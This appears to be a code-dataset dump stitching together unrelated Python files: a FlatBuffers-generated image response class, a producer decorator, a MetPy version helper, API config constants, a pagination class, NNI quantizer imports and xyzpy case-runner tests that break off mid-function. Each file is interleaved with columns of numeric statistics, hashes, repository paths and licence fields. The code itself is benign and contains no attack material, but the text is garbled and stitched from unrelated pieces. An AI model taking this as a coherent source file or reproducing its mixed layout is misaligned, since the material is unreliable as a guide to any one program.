# automatically generated by the FlatBuffers compiler, do not modify # namespace: Image import flatbuffers from flatbuffers.compat import import_numpy np = import_numpy() class CdnImageFetchResp(object): __slots__ = ['_tab'] @classmethod def GetRootAsCdnImageFetchResp(cls, buf, offset): n = flatbuffers.encode.Get(flatbuffers.packer.uoffset, buf, offset) x = CdnImageFetchResp() x.Init(buf, n + offset) return x # CdnImageFetchResp def Init(self, buf, pos): self._tab = flatbuffers.table.Table(buf, pos) # CdnImageFetchResp def Status(self): o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4)) if o != 0: return self._tab.Get(flatbuffers.number_types.Uint8Flags, o + self._tab.Pos) return 0 # CdnImageFetchResp def Content(self, j): o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6)) if o != 0: a = self._tab.Vector(o) return self._tab.Get(flatbuffers.number_types.Uint8Flags, a + flatbuffers.number_types.UOffsetTFlags.py_type(j * 1)) return 0 # CdnImageFetchResp def ContentAsNumpy(self): o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6)) if o != 0: return self._tab.GetVectorAsNumpy(flatbuffers.number_types.Uint8Flags, o) return 0 # CdnImageFetchResp def ContentLength(self): o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6)) if o != 0: return self._tab.VectorLen(o) return 0 # CdnImageFetchResp def ContentIsNone(self): o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6)) return o == 0 def CdnImageFetchRespStart(builder): builder.StartObject(2) def CdnImageFetchRespAddStatus(builder, status): builder.PrependUint8Slot(0, status, 0) def CdnImageFetchRespAddContent(builder, content): builder.PrependUOffsetTRelativeSlot(1, flatbuffers.number_types.UOffsetTFlags.py_type(content), 0) def CdnImageFetchRespStartContentVector(builder, numElems): return builder.StartVector(1, numElems, 1) def CdnImageFetchRespEnd(builder): return builder.EndObject()
36.177419
149
0.701293
257
2,243
5.980545
0.284047
0.054652
0.143136
0.159401
0.392973
0.335068
0.279115
0.279115
0.216656
0.216656
0
0.014493
0.200178
2,243
61
150
36.770492
0.842252
0.085154
0
0.285714
1
0
0.001958
0
0
0
0
0
0
1
0.285714
false
0
0.071429
0.047619
0.642857
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
3
73c7d2479c4d1e666c228c7f65f5dc34f85544de
570
py
Python
producers/decorator.py
gurleen/dtv-gfx-next
529c226a30c9b668a44e2a2470c3593287867caf
[ "MIT" ]
null
null
null
producers/decorator.py
gurleen/dtv-gfx-next
529c226a30c9b668a44e2a2470c3593287867caf
[ "MIT" ]
null
null
null
producers/decorator.py
gurleen/dtv-gfx-next
529c226a30c9b668a44e2a2470c3593287867caf
[ "MIT" ]
null
null
null
import functools
from . import *
import producers

# Registry of (function, debug_only, prod_only) triples filled by @producer.
producer_funcs = []


def producer(*args, **kwargs):
    """Decorator that registers a producer function.

    Works both bare (``@producer``) and parameterized
    (``@producer(debug_only=True)`` / ``@producer(prod_only=True)``).
    """
    debug_only = kwargs.get("debug_only", False)
    prod_only = kwargs.get("prod_only", False)

    def decorate(func):
        producer_funcs.append((func, debug_only, prod_only))

        @functools.wraps(func)
        def passthrough(*call_args, **call_kwargs):
            return func(*call_args, **call_kwargs)

        return passthrough

    # Bare usage: "@producer" hands us the decorated function directly.
    if args and callable(args[0]):
        return decorate(args[0])
    return decorate


def collect_producers():
    """Return the list of producer functions registered so far."""
    return producer_funcs
19.655172
60
0.642105
70
570
5.085714
0.371429
0.109551
0.073034
0.101124
0
0
0
0
0
0
0
0.006912
0.238596
570
28
61
20.357143
0.813364
0
0
0
0
0
0.033333
0
0
0
0
0
0
1
0.222222
false
0
0.166667
0.111111
0.666667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
73d7e36e0f5af950d58e18966f412469cf517ac3
931
py
Python
src/metpy/_version.py
MethaneRain/MetPy
d5e1416e038dd01f9d528d824e12224ab56e009c
[ "BSD-3-Clause" ]
null
null
null
src/metpy/_version.py
MethaneRain/MetPy
d5e1416e038dd01f9d528d824e12224ab56e009c
[ "BSD-3-Clause" ]
127
2020-10-27T15:12:37.000Z
2022-03-30T16:05:31.000Z
src/metpy/_version.py
MethaneRain/MetPy
d5e1416e038dd01f9d528d824e12224ab56e009c
[ "BSD-3-Clause" ]
null
null
null
# Copyright (c) 2019 MetPy Developers.
# Distributed under the terms of the BSD 3-Clause License.
# SPDX-License-Identifier: BSD-3-Clause
"""Tools for versioning."""


def get_version():
    """Get MetPy's version.

    Either get it from package metadata, or get it using version control
    information if a development install.

    Returns the resolved version string, or 'Unknown' when no package
    metadata can be found.
    """
    try:
        # Alias the import so it does not shadow this function's own name.
        from setuptools_scm import get_version as scm_get_version
        return scm_get_version(root='../..', relative_to=__file__,
                               version_scheme='post-release',
                               local_scheme='dirty-tag')
    except (ImportError, LookupError):
        try:
            from importlib.metadata import version, PackageNotFoundError
        except ImportError:
            # Can remove when we require Python > 3.7
            from importlib_metadata import version, PackageNotFoundError
        try:
            return version(__package__)
        except PackageNotFoundError:
            return 'Unknown'
34.481481
87
0.663802
104
931
5.788462
0.615385
0.049834
0.033223
0.089701
0.179402
0.179402
0
0
0
0
0
0.011561
0.256713
931
26
88
35.807692
0.858382
0.346939
0
0.214286
0
0
0.056799
0
0
0
0
0
0
1
0.071429
true
0
0.357143
0
0.642857
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
3
73ec25c709ed7bbba8bf8288a093ad286649cf58
230
py
Python
pekobot/default_config.py
Akegarasu/pekobot
402075d4de13d3fd9e58f22fc62338c58fb96663
[ "BSD-2-Clause" ]
2
2021-02-09T03:28:30.000Z
2021-04-27T17:58:19.000Z
pekobot/default_config.py
Akegarasu/pekobot
402075d4de13d3fd9e58f22fc62338c58fb96663
[ "BSD-2-Clause" ]
null
null
null
pekobot/default_config.py
Akegarasu/pekobot
402075d4de13d3fd9e58f22fc62338c58fb96663
[ "BSD-2-Clause" ]
null
null
null
from datetime import timedelta
from typing import Collection, Union, Iterable, Pattern, Optional, Dict, Any

# presumably a flag/level controlling payload compression — TODO confirm usage
COMPRESS: int = 1
# enables debug behaviour elsewhere in the bot (assumption from the name)
DEBUG: bool = True
# Kaiheila API version embedded in API_URL below
API_VERSION: int = 3
# Base URL for the Kaiheila (KOOK) HTTP API
API_URL: str = f"https://www.kaiheila.cn/api/v{API_VERSION}"
23
76
0.747826
36
230
4.694444
0.805556
0.118343
0
0
0
0
0
0
0
0
0
0.010152
0.143478
230
9
77
25.555556
0.847716
0
0
0
0
0
0.183406
0
0
0
0
0
0
1
0
true
0
0.333333
0
0.333333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
3
73f108b86b2b6641b0239d0f4e78bcf681b01f10
144
py
Python
codewof/programming/content/en/reverse-string/solution.py
taskmaker1/codewof
92d52cd3ee91f0f311ff01a92cf6ec07e5593b8d
[ "MIT" ]
3
2019-08-29T04:11:22.000Z
2021-06-22T16:05:51.000Z
codewof/programming/content/en/reverse-string/solution.py
taskmaker1/codewof
92d52cd3ee91f0f311ff01a92cf6ec07e5593b8d
[ "MIT" ]
265
2019-05-30T03:51:46.000Z
2022-03-31T01:05:12.000Z
codewof/programming/content/en/reverse-string/solution.py
samuelsandri/codewof
c9b8b378c06b15a0c42ae863b8f46581de04fdfc
[ "MIT" ]
7
2019-06-29T12:13:37.000Z
2021-09-06T06:49:14.000Z
def reverse_string(string):
    """Print the characters of *string* in reverse order."""
    reversed_text = ''
    # Walk the string back-to-front and accumulate the characters.
    for char in reversed(string):
        reversed_text += char
    print(reversed_text)
24
47
0.590278
19
144
4.421053
0.526316
0.309524
0
0
0
0
0
0
0
0
0
0.028037
0.256944
144
5
48
28.8
0.757009
0
0
0
0
0
0
0
0
0
0
0
0
1
0.2
false
0
0
0
0.2
0.2
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
73f39e42318716e272273d743fb0c7cfd170716d
145
py
Python
restorm/exceptions.py
josesanch/restorm
2a8af13e57151ea985445e1e7189158f20cd9676
[ "MIT" ]
1
2015-07-16T15:00:04.000Z
2015-07-16T15:00:04.000Z
restorm/exceptions.py
josesanch/restorm
2a8af13e57151ea985445e1e7189158f20cd9676
[ "MIT" ]
null
null
null
restorm/exceptions.py
josesanch/restorm
2a8af13e57151ea985445e1e7189158f20cd9676
[ "MIT" ]
null
null
null
class RestException(Exception):
    """Base class for errors raised by restorm."""


class ResourceException(RestException):
    """Error concerning a REST resource."""


class RestServerException(RestException):
    """Error reported by the REST server."""
13.181818
41
0.765517
12
145
9.25
0.5
0.162162
0
0
0
0
0
0
0
0
0
0
0.172414
145
10
42
14.5
0.925
0
0
0.5
0
0
0
0
0
0
0
0
0
1
0
true
0.5
0
0
0.5
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
0
0
0
0
0
3
fb47e7a4e34dc79a3540da9d562779befff02f36
209
py
Python
programming-logic/placeholder.py
raulrosapacheco/python3-udemy
b84e6f82417aecd0e2a28c3fb3cb222e057a660b
[ "MIT" ]
null
null
null
programming-logic/placeholder.py
raulrosapacheco/python3-udemy
b84e6f82417aecd0e2a28c3fb3cb222e057a660b
[ "MIT" ]
null
null
null
programming-logic/placeholder.py
raulrosapacheco/python3-udemy
b84e6f82417aecd0e2a28c3fb3cb222e057a660b
[ "MIT" ]
null
null
null
""" 'pass' or '...' (ellipsis) works as a placeholder for the programmer to write something later """ valor = True if valor: pass else: print('Bye') print() if valor: ... else: print('Bye')
12.294118
93
0.602871
28
209
4.5
0.714286
0.111111
0.190476
0
0
0
0
0
0
0
0
0
0.239234
209
16
94
13.0625
0.792453
0.444976
0
0.6
0
0
0.055556
0
0
0
0
0
0
1
0
false
0.1
0
0
0
0.3
1
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
3
fb632ece452922eaad81259b7a53f4c983cf14ad
456
py
Python
nni/algorithms/compression/pytorch/quantization/__init__.py
dutxubo/nni
c16f4e1c89b54b8b80661ef0072433d255ad2d24
[ "MIT" ]
9,680
2019-05-07T01:42:30.000Z
2022-03-31T16:48:33.000Z
nni/algorithms/compression/pytorch/quantization/__init__.py
dutxubo/nni
c16f4e1c89b54b8b80661ef0072433d255ad2d24
[ "MIT" ]
1,957
2019-05-06T21:44:21.000Z
2022-03-31T09:21:53.000Z
nni/algorithms/compression/pytorch/quantization/__init__.py
dutxubo/nni
c16f4e1c89b54b8b80661ef0072433d255ad2d24
[ "MIT" ]
1,571
2019-05-07T06:42:55.000Z
2022-03-31T03:19:24.000Z
# Copyright (c) Microsoft Corporation. # Licensed under the MIT license. from .bnn_quantizer import BNNQuantizer from .dorefa_quantizer import DoReFaQuantizer from .lsq_quantizer import LsqQuantizer from .native_quantizer import NaiveQuantizer from .observer_quantizer import ObserverQuantizer from .qat_quantizer import QAT_Quantizer __all__ = ['NaiveQuantizer', 'QAT_Quantizer', 'DoReFaQuantizer', 'BNNQuantizer', 'LsqQuantizer', 'ObserverQuantizer']
35.076923
117
0.828947
48
456
7.625
0.5
0.245902
0
0
0
0
0
0
0
0
0
0
0.100877
456
12
118
38
0.892683
0.149123
0
0
0
0
0.215584
0
0
0
0
0
0
1
0
false
0
0.857143
0
0.857143
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
3
fb7096c4be6076a0b02196abdbe74f8929579471
227
py
Python
api/boilerplate/exceptions.py
SteffenBerlin/django-rest-chatbot
8c7966f38ccd6fb0eb71dc2025f74f88ccfa89cd
[ "MIT" ]
null
null
null
api/boilerplate/exceptions.py
SteffenBerlin/django-rest-chatbot
8c7966f38ccd6fb0eb71dc2025f74f88ccfa89cd
[ "MIT" ]
null
null
null
api/boilerplate/exceptions.py
SteffenBerlin/django-rest-chatbot
8c7966f38ccd6fb0eb71dc2025f74f88ccfa89cd
[ "MIT" ]
null
null
null
from rest_framework.exceptions import APIException


class ServiceUnavailable(APIException):
    """DRF exception rendered as HTTP 503 with a retry-later message."""
    status_code = 503
    default_detail = 'Service temporarily unavailable, try again later.'
    default_code = 'service_unavailable'
37.833333
72
0.801762
24
227
7.375
0.791667
0
0
0
0
0
0
0
0
0
0
0.015385
0.140969
227
6
73
37.833333
0.892308
0
0
0
0
0
0.298246
0
0
0
0
0
0
1
0
false
0
0.2
0
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
3
fb7b3732a00d5933c96ba7ee53002e202f3ffdfe
866
py
Python
ninjin/pagination.py
dmitrii-sim/ninjin
6c3edb46ec873f28ed0b1fcbe20193445e3107e9
[ "MIT" ]
2
2020-06-03T07:44:46.000Z
2020-06-05T11:30:46.000Z
ninjin/pagination.py
dmitrii-sim/ninjin
6c3edb46ec873f28ed0b1fcbe20193445e3107e9
[ "MIT" ]
null
null
null
ninjin/pagination.py
dmitrii-sim/ninjin
6c3edb46ec873f28ed0b1fcbe20193445e3107e9
[ "MIT" ]
1
2020-06-18T15:59:18.000Z
2020-06-18T15:59:18.000Z
class BasicPagination:
    """Limit/offset pagination helper.

    Derives ``limit`` and ``offset`` for a zero-based ``page`` taken from a
    ``pagination`` mapping, clamping the effective page size to
    ``max_items_per_page``.
    """

    # Class-level defaults, used when neither the pagination mapping nor the
    # constructor keywords supply a value.
    items_per_page = 1
    max_items_per_page = 100

    def __init__(self,
                 pagination: dict = None,
                 items_per_page: int = None,
                 max_items_per_page: int = None):
        """
        :param pagination: optional mapping with 'page' and 'items_per_page'.
        :param items_per_page: fallback page size when the mapping has none.
        :param max_items_per_page: upper bound on the effective page size.
        """
        pagination = pagination or {}
        self.page = pagination.get('page', 0)
        # BUGFIX: previously None values flowed straight into min(), raising
        # TypeError whenever either size argument was omitted; the class-level
        # defaults above were unreachable. Fall back to them explicitly.
        if max_items_per_page is None:
            max_items_per_page = type(self).max_items_per_page
        self.max_items_per_page = max_items_per_page
        requested = pagination.get('items_per_page', items_per_page)
        if requested is None:
            requested = type(self).items_per_page
        self.items_per_page = min(requested, self.max_items_per_page)
        self.limit = (self.page + 1) * self.items_per_page
        self.offset = self.page * self.items_per_page
        self.next = False

    def paginate(self, query):
        """Apply this page's limit/offset to *query* (chained .limit()/.offset())."""
        return query.limit(self.limit).offset(self.offset)

    @property
    def result(self):
        # TODO next page
        return {
            'page': self.page
        }
28.866667
61
0.581986
107
866
4.401869
0.271028
0.203822
0.305732
0.159236
0.329087
0
0
0
0
0
0
0.010309
0.327945
866
29
62
29.862069
0.798969
0.016166
0
0
0
0
0.025882
0
0
0
0
0.034483
0
1
0.125
false
0
0
0.083333
0.333333
0
0
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
3
fb7edea6547e5448747188195492f349f50755fb
18,847
py
Python
tests/test_gen/test_case_runner.py
toddrme2178/xyzpy
d71057df6cd7db48cfcbfacc21e77b4b79176afa
[ "MIT" ]
null
null
null
tests/test_gen/test_case_runner.py
toddrme2178/xyzpy
d71057df6cd7db48cfcbfacc21e77b4b79176afa
[ "MIT" ]
null
null
null
tests/test_gen/test_case_runner.py
toddrme2178/xyzpy
d71057df6cd7db48cfcbfacc21e77b4b79176afa
[ "MIT" ]
null
null
null
import pytest import xarray as xr import numpy as np from numpy.testing import assert_allclose from xyzpy.gen.case_runner import ( case_runner, _cases_to_ds, case_runner_to_ds, find_missing_cases, fill_missing_cases, ) from xyzpy.gen.combo_runner import combo_runner_to_ds from . import ( foo3_scalar, foo3_float_bool, foo2_array, foo2_array_array, foo2_zarray1_zarray2, ) # --------------------------------------------------------------------------- # # CASE_RUNNER tests # # --------------------------------------------------------------------------- # class TestCaseRunner: def test_seq(self): cases = ((1, 10, 100), (2, 20, 200), (3, 30, 300)) xs = case_runner(foo3_scalar, ('a', 'b', 'c'), cases, verbosity=0) assert xs == (111, 222, 333) def test_progbar(self): cases = ((1, 10, 100), (2, 20, 200), (3, 30, 300)) xs = case_runner(foo3_scalar, ('a', 'b', 'c'), cases, verbosity=2) assert xs == (111, 222, 333) def test_constants(self): cases = ((1,), (2,), (3,)) xs = case_runner(foo3_scalar, ('a', 'b', 'c'), cases, constants={'b': 10, 'c': 100}) assert xs == (111, 112, 113) def test_parallel(self): cases = ((1, 10, 100), (2, 20, 200), (3, 30, 300)) xs = case_runner(foo3_scalar, ('a', 'b', 'c'), cases, num_workers=1) assert xs == (111, 222, 333) def test_split(self): cases = ((1, 10, 100), (2, 20, 200), (3, 30, 300)) a, b = case_runner(foo3_float_bool, ('a', 'b', 'c'), cases, split=True) assert a == (111, 222, 333) assert b == (False, True, False) def test_single_args(self): cases = (1, 2, 3) xs = case_runner(foo3_scalar, 'a', cases, constants={'b': 10, 'c': 100}) assert xs == (111, 112, 113) class TestCasesToDS: def test_simple(self): results = ((1,), (2,), (3,), (4,), (5,)) cases = (('a', 'a'), ('a', 'b'), ('b', 'c'), ('c', 'c'), ('b', 'a')) ds = _cases_to_ds(results=results, fn_args=('case1', 'case2'), var_names=('bananas',), cases=cases, var_dims={'bananas': ()}, var_coords={}) assert_allclose(ds.bananas.data, [[1, 2, np.nan], [5, np.nan, 3], [np.nan, np.nan, 4]]) def 
test_single_result_format(self): results = [(1,), (2,), (3,), (4,), (5,)] cases = [('a', 'a'), ('a', 'b'), ('b', 'c'), ('c', 'c'), ('b', 'a')] ds = _cases_to_ds(results=results, cases=cases, fn_args=('case1', 'case2'), var_names=('bananas',), var_dims={'bananas': ()}, var_coords={}) assert_allclose(ds.bananas.data, [[1, 2, np.nan], [5, np.nan, 3], [np.nan, np.nan, 4]]) def test_single_cases_format(self): results = [(1,), (2,), (3,), (4,), (5,)] cases = [('a',), ('b',), ('c',), ('d',), ('e',)] ds = _cases_to_ds(results=results, cases=cases, fn_args=('case1',), var_names=('bananas',), var_dims={'bananas': ()}, var_coords={},) assert_allclose(ds.bananas.data, [1, 2, 3, 4, 5]) def test_multires(self): var_names = ('lists',) var_vals = [np.arange(10) + i for i in range(5)] var_dims = {'lists': ('time',)} var_coords = {'time': np.arange(10) / 10} fn_args = ('letter',) case_cnfgs = ['a', 'b', 'c', 'd', 'e'] ds = _cases_to_ds(results=var_vals, fn_args=fn_args, cases=case_cnfgs, var_names=var_names, var_dims=var_dims, var_coords=var_coords) assert ds.time.data.dtype == float def test_add_to_ds(self): ds = xr.Dataset(coords={'a': [1, 2], 'b': [10, 20]}) ds['x'] = (('a', 'b'), [[11, 21], [12, 0]]) assert ds['x'].sel(a=2, b=20).data == 0 _cases_to_ds(results=[22], fn_args=['a', 'b'], cases=[[2, 20]], var_names=['x'], add_to_ds=ds, overwrite=True) assert ds['x'].data.dtype == int assert ds['x'].sel(a=2, b=20).data == 22 def test_add_to_ds_array(self): ds = xr.Dataset(coords={'a': [1, 2], 'b': [10, 20], 't': [0.1, 0.2, 0.3]}) ds['x'] = (('a', 'b', 't'), [[[11.1, 11.2, 11.3], [21.1, 21.2, 21.3]], [[12.1, 12.2, 12.3], [0, 0, 0]]]) assert_allclose(ds['x'].sel(a=2, b=20).data, [0, 0, 0]) _cases_to_ds(results=[[[22.1, 22.2, 22.3]]], fn_args=['a', 'b'], cases=[[2, 20]], var_names=['x'], var_dims=['t'], add_to_ds=ds, overwrite=True) assert_allclose(ds['x'].sel(a=2, b=20).data, [22.1, 22.2, 22.3]) def test_add_to_ds_no_overwrite(self): ds = xr.Dataset(coords={'a': [1, 2], 'b': [10, 
20]}) ds['x'] = (('a', 'b'), [[11, 21], [12, 0]]) assert ds['x'].sel(a=2, b=20).data == 0 with pytest.raises(ValueError): _cases_to_ds(results=[22], fn_args=['a', 'b'], cases=[[2, 20]], var_names=['x'], add_to_ds=ds, overwrite=False) ds = xr.Dataset(coords={'a': [1, 2], 'b': [10, 20]}) ds['x'] = (('a', 'b'), [[11, 21], [12, None]]) _cases_to_ds(results=[22], fn_args=['a', 'b'], cases=[[2, 20]], var_names=['x'], add_to_ds=ds, overwrite=False) assert ds['x'].sel(a=2, b=20).data == 22 class TestCaseRunnerToDS: def test_single(self): cases = [(1, 20, 300), (3, 20, 100)] ds = case_runner_to_ds(foo3_scalar, ['a', 'b', 'c'], cases=cases, var_names='sum') assert_allclose(ds['a'].data, [1, 3]) assert_allclose(ds['b'].data, [20]) assert_allclose(ds['c'].data, [100, 300]) assert ds['sum'].loc[{'a': 1, 'b': 20, 'c': 300}].data == 321 assert ds['sum'].loc[{'a': 3, 'b': 20, 'c': 100}].data == 123 assert ds['sum'].loc[{'a': 1, 'b': 20, 'c': 100}].isnull() assert ds['sum'].loc[{'a': 3, 'b': 20, 'c': 300}].isnull() def test_single_dict_cases(self): cases = [{'a': 1, 'b': 20, 'c': 300}, {'a': 3, 'b': 20, 'c': 100}] ds = case_runner_to_ds(foo3_scalar, None, cases=cases, var_names='sum') assert_allclose(ds['a'].data, [1, 3]) assert_allclose(ds['b'].data, [20]) assert_allclose(ds['c'].data, [100, 300]) assert ds['sum'].loc[{'a': 1, 'b': 20, 'c': 300}].data == 321 assert ds['sum'].loc[{'a': 3, 'b': 20, 'c': 100}].data == 123 assert ds['sum'].loc[{'a': 1, 'b': 20, 'c': 100}].isnull() assert ds['sum'].loc[{'a': 3, 'b': 20, 'c': 300}].isnull() def test_multires(self): cases = [(1, 20, 300), (3, 20, 100)] ds = case_runner_to_ds(foo3_float_bool, fn_args=['a', 'b', 'c'], cases=cases, var_names=['sum', 'a_even']) assert_allclose(ds['a'].data, [1, 3]) assert_allclose(ds['b'].data, [20]) assert_allclose(ds['c'].data, [100, 300]) assert ds['sum'].loc[{'a': 1, 'b': 20, 'c': 300}].data == 321 assert ds['sum'].loc[{'a': 3, 'b': 20, 'c': 100}].data == 123 assert ds['sum'].loc[{'a': 1, 'b': 20, 'c': 
100}].isnull() assert ds['sum'].loc[{'a': 3, 'b': 20, 'c': 300}].isnull() assert ds['a_even'].data.dtype == object assert bool(ds['a_even'].sel(a=1, b=20, c=300).data) is False assert bool(ds['a_even'].sel(a=3, b=20, c=100).data) is False assert ds['a_even'].loc[{'a': 1, 'b': 20, 'c': 100}].isnull() assert ds['a_even'].loc[{'a': 3, 'b': 20, 'c': 300}].isnull() def test_array_return(self): ds = case_runner_to_ds(fn=foo2_array, fn_args=['a', 'b'], cases=[(2, 30), (4, 50)], var_names='x', var_dims=['time'], var_coords={'time': np.arange(10) / 10}) assert ds.x.data.dtype == float assert ds.x.sel(a=2, b=50, time=0.7).isnull() assert ds.x.sel(a=4, b=50, time=0.3).data == 54.3 def test_multi_array_return(self): ds = case_runner_to_ds(fn=foo2_array_array, fn_args=['a', 'b'], cases=[(2, 30), (4, 50)], var_names=['x', 'y'], var_dims={('x', 'y'): 'time'}, var_coords={'time': ['a', 'b', 'c', 'd', 'e']}) assert ds['time'].data.dtype != object assert_allclose(ds['x'].sel(a=4, b=50).data, [50, 54, 58, 62, 66]) assert_allclose(ds['y'].sel(a=4, b=50).data, [50, 46, 42, 38, 34]) def test_align_and_fillna_int(self): ds1 = case_runner_to_ds(foo2_array_array, fn_args=['a', 'b'], cases=[(1, 10), (2, 20)], var_names=['x', 'y'], var_dims={('x', 'y'): 'time'}, var_coords={'time': ['a', 'b', 'c', 'd', 'e']}) ds2 = case_runner_to_ds(foo2_array_array, fn_args=['a', 'b'], cases=[(2, 10), (1, 20)], var_names=['x', 'y'], var_dims={('x', 'y'): 'time'}, var_coords={'time': ['a', 'b', 'c', 'd', 'e']}) assert not np.logical_not(ds1['x'].isnull()).all() assert not np.logical_not(ds1['y'].isnull()).all() assert not np.logical_not(ds2['x'].isnull()).all() assert not np.logical_not(ds2['y'].isnull()).all() ds1, ds2 = xr.align(ds1, ds2, join='outer') fds = ds1.fillna(ds2) assert np.logical_not(fds['x'].isnull()).all() assert np.logical_not(fds['y'].isnull()).all() def test_align_and_fillna_complex(self): ds1 = case_runner_to_ds(foo2_zarray1_zarray2, fn_args=['a', 'b'], cases=[(1j, 10), (2j, 20)], 
var_names=['x', 'y'], var_dims={('x', 'y'): 'time'}, var_coords={'time': ['a', 'b', 'c', 'd', 'e']}) ds2 = case_runner_to_ds(foo2_zarray1_zarray2, fn_args=['a', 'b'], cases=[(2j, 10), (1j, 20)], var_names=['x', 'y'], var_dims={('x', 'y'): 'time'}, var_coords={'time': ['a', 'b', 'c', 'd', 'e']}) assert not np.logical_not(np.isnan(ds1['x'].data)).all() assert not np.logical_not(np.isnan(ds1['y'].data)).all() assert not np.logical_not(np.isnan(ds2['x'].data)).all() assert not np.logical_not(np.isnan(ds2['y'].data)).all() assert all(t == complex for t in (ds1.x.dtype, ds2.x.dtype, ds1.y.dtype, ds2.y.dtype)) assert ds1.y.dtype == complex assert ds2.y.dtype == complex ds1, ds2 = xr.align(ds1, ds2, join='outer') fds = ds1.fillna(ds2) assert np.logical_not(np.isnan(fds['x'].data)).all() assert np.logical_not(np.isnan(fds['y'].data)).all() # --------------------------------------------------------------------------- # # Finding and filling missing data # # --------------------------------------------------------------------------- # class TestFindMissingCases: def test_simple(self): ds = xr.Dataset(coords={'a': [1, 2, 3], 'b': [40, 50]}) ds['x'] = (('a', 'b'), np.array([[0.1, np.nan], [np.nan, 0.2], [np.nan, np.nan]])) # Target cases and settings t_cases = ((1, 50), (2, 40), (3, 40), (3, 50)) t_configs = tuple(dict(zip(['a', 'b'], t_case)) for t_case in t_cases) # Missing cases and settings m_args, m_cases = find_missing_cases(ds) m_configs = tuple(dict(zip(m_args, m_case)) for m_case in m_cases) # Assert same set of coordinates assert all(t_config in m_configs for t_config in t_configs) assert all(m_config in t_configs for m_config in m_configs) def test_multires(self): ds = xr.Dataset(coords={'a': [1, 2, 3], 'b': [40, 50]}) ds['x'] = (('a', 'b'), np.array([[0.1, np.nan], [np.nan, 0.2], [np.nan, np.nan]])) ds['y'] = (('a', 'b'), np.array([['a', None], [None, 'b'], [None, None]])) # Target cases and settings t_cases = ((1, 50), (2, 40), (3, 40), (3, 50)) t_configs = 
tuple(dict(zip(['a', 'b'], t_case)) for t_case in t_cases) # Missing cases and settings m_args, m_cases = find_missing_cases(ds) m_configs = tuple(dict(zip(m_args, m_case)) for m_case in m_cases) # Assert same set of coordinates assert set(m_args) == {'a', 'b'} assert all(t_config in m_configs for t_config in t_configs) assert all(m_config in t_configs for m_config in m_configs) def test_var_dims_leave(self): ds = xr.Dataset(coords={'a': [1, 2, 3], 'b': [40, 50], 't': [0.1, 0.2, 0.3]}) ds['x'] = (('a', 'b'), np.array([[0.1, np.nan], [np.nan, 0.2], [np.nan, np.nan]])) ds['y'] = (('a', 'b', 't'), np.array([[[0.2] * 3, [np.nan] * 3], [[np.nan] * 3, [0.4] * 3], [[np.nan] * 3, [np.nan] * 3]])) # Target cases and settings t_cases = ((1, 50), (2, 40), (3, 40), (3, 50)) t_configs = tuple(dict(zip(['a', 'b'], t_case)) for t_case in t_cases) # Missing cases and settings m_args, m_cases = find_missing_cases(ds, ignore_dims='t') m_configs = tuple(dict(zip(m_args, m_case)) for m_case in m_cases) # Assert same set of coordinates assert set(m_args) == {'a', 'b'} assert all(t_config in m_configs for t_config in t_configs) assert all(m_config in t_configs for m_config in m_configs) class TestFillMissingCases: def test_simple(self): ds = xr.Dataset(coords={'a': [1, 2, 3], 'b': [40, 50]}) ds['x'] = (('a', 'b'), np.array([[641, np.nan], [np.nan, 652], [np.nan, np.nan]])) fill_missing_cases(ds, fn=foo3_scalar, constants={'c': 600}, var_names='x') assert_allclose(ds.x.data, [[641, 651], [642, 652], [643, 653]]) def test_multires(self): ds = xr.Dataset(coords={'a': [1, 2, 3], 'b': [40, 50]}) ds['x'] = (('a', 'b'), np.array([[641, np.nan], [np.nan, 652], [np.nan, np.nan]])) ds['even'] = (('a', 'b'), np.array([[False, None], [None, True], [None, None]])) fill_missing_cases(ds, fn=foo3_float_bool, constants={'c': 600}, var_names=['x', 'even']) assert_allclose(ds.x.data, [[641, 651], [642, 652], [643, 653]]) assert(ds.even.data.tolist() == [[False, False], [True, True], [False, False]]) def 
